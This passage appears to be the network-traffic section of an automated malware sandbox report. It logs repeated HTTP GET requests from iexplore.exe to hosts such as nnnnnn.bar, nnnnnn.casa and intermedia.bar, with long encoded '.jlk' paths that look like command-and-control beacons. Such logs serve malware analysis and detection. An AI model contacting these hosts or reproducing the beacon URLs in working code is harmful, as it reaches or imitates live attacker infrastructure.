                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 63 30 6e 50 59 46 58 34 7a 62 35 39 68 5f 32 46 2f 71 63 74 56 50 31 32 57 43 46 4e 52 4a 6f 4f 2f 30 48 39 4e 7a 55 5a 72 69 70 51 4c 78 59 54 62 47 64 2f 52 36 32 44 6a 55 4a 62 76 2f 41 6b 54 76 6e 42 54 49 4f 50 30 67 47 64 63 44 43 31 56 67 2f 48 39 78 54 4f 35 38 67 77 39 53 72 33 49 35 66 31 6f 45 2f 38 35 32 6f 57 66 51 4c 6a 31 65 4c 5f 32 46 6d 5f 32 46 4b 6e 75 2f 53 49 48 54 65 61 46 37 42 67 76 69 67 2f 50 79 48 78 5a 4c 44 6b 2f 5a 55 76 43 65 4e 70 61 69 69 78 64 75 63 4e 56 39 78 52 5a 6c 4f 67 2f 31 70 31 59 4b 6b 41 76 50 65 2f 54 36 55 69 5a 55 30 38 4d 48 65 73 59 46 53 62 41 2f 76 69 56 63 68 73 6e 4f 78 71 4a 35 2f 34 59 4d 6e 63 54 6d 45 6d 42 6b 2f 6b 36 54 33 4e 48 49 76 36 36 6d 79 6d 43 2f 62 37 48 6b 69 67 32 66 6b 79 43 55 69 2f 32 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk'>Found</a>.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  55192.168.2.349889192.64.119.23380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:19.304620981 CET12398OUTGET /drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:19.464982033 CET12400INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:55:19 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 320
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 6b 6e 74 47 48 6c 4f 66 36 79 31 6c 37 4b 2f 6b 43 54 55 31 66 72 73 55 64 51 78 6e 68 6e 5f 32 46 65 67 6f 2f 6d 77 36 62 4a 58 4c 78 6e 66 49 52 4c 32 63 6a 2f 46 72 64 55 75 63 70 47 39 33 68 68 45 79 5f 2f 32 46 5f 32 46 30 35 51 33 50 4f 65 61 64 69 79 73 31 2f 39 77 4c 57 48 6d 36 47 78 2f 77 71 68 4e 49 32 39 49 64 55 64 76 33 43 57 44 79 43 66 73 2f 32 56 44 30 74 42 74 30 73 7a 48 71 50 54 47 4e 4d 61 50 2f 48 38 63 31 52 53 6c 7a 6d 7a 37 78 41 36 61 4d 78 65 75 6e 4a 53 2f 65 67 57 78 6f 6d 75 47 6b 77 62 73 6f 2f 41 74 32 44 32 30 42 49 2f 73 69 69 65 58 79 6d 53 36 50 4a 72 38 69 6d 5f 32 46 50 4a 65 79 65 2f 43 7a 6c 72 6b 30 67 47 6c 78 2f 42 34 5f 32 46 6e 52 6b 57 31 5f 32 46 56 59 62 69 2f 46 6d 4d 58 48 5f 32 42 62 6e 32 71 2f 39 41 62 62 65 35 68 70 68 58 52 2f 78 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk'>Found</a>.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  56192.168.2.349890198.54.117.21080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:19.340749979 CET12399OUTGET /drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: www.nnnnnn.casa


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  57192.168.2.349891198.54.117.21680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:19.661740065 CET12401OUTGET /drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: www.nnnnnn.casa


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  58192.168.2.349893162.255.119.17780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:30.693897963 CET12402OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:31.135282040 CET12403OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:31.666309118 CET12404OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:32.635396957 CET12406OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:34.557248116 CET12406OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:38.385730028 CET12407OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:46.042517900 CET12410OUTGET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  59192.168.2.349892162.255.119.17780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:30.921610117 CET12403OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:31.228916883 CET12404OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:31.541513920 CET12404OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:32.150764942 CET12405OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:33.354209900 CET12406OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:35.760483980 CET12407OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.34975031.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:32.300170898 CET1140OUTGET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  60192.168.2.34989431.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:39.651832104 CET12408OUTGET /drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87/xXKn3PzxfNPne/1IWtDw4e/zao8w3_2FqS1tUowEpdILrG/AQc_2F2CTQ/Kg84n698KmhLQ87R8/T3KY8S12PpxD/H69sMspGVxv/is2jKybUtpc7W2/tjpg5c_2BM2CHgmR9sa3h/opwZ5u985b9SYlvV/9nvFId2LU1FOjTP/3gzCgoFC/zqOGqAVh/K.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: intermedia.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  61192.168.2.34989531.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:40.062398911 CET12409OUTGET /drew/8GCWuTw3vFr_2BaLQHxEj/S2mZ_2Bs1ztZVt4J/tWEHNc4XanBwmnu/I2msIqz_2B6GZdxr2f/MEql68nFt/nYxdw4RZXpFaqbijhmkw/0I3UhZ9PcRsKOEspkq8/7YzXu2AOi0fYDlLet1LtxN/Z8j42Kwsx6Kh3/NutAzqvZ/KcYW58Xr4T1MQTJAJB2YAhX/pcuj3_2Fx_/2BQrkwFa603_2B68s/I0dGq_2F0eCx/w74Pufb9K3x/hd2DOR_2F/4NgLz6GD.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: intermedia.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  62192.168.2.349897162.255.119.17780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:55:59.956077099 CET12411OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:00.387495995 CET12412OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:00.903311968 CET12413OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:01.856380939 CET12414OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:03.747212887 CET12415OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:07.528678894 CET12416OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:15.077811956 CET12417OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  63192.168.2.349898162.255.119.17780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:56:00.402211905 CET12412OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:00.840862036 CET12413OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:01.387602091 CET12414OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:02.387679100 CET12415OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
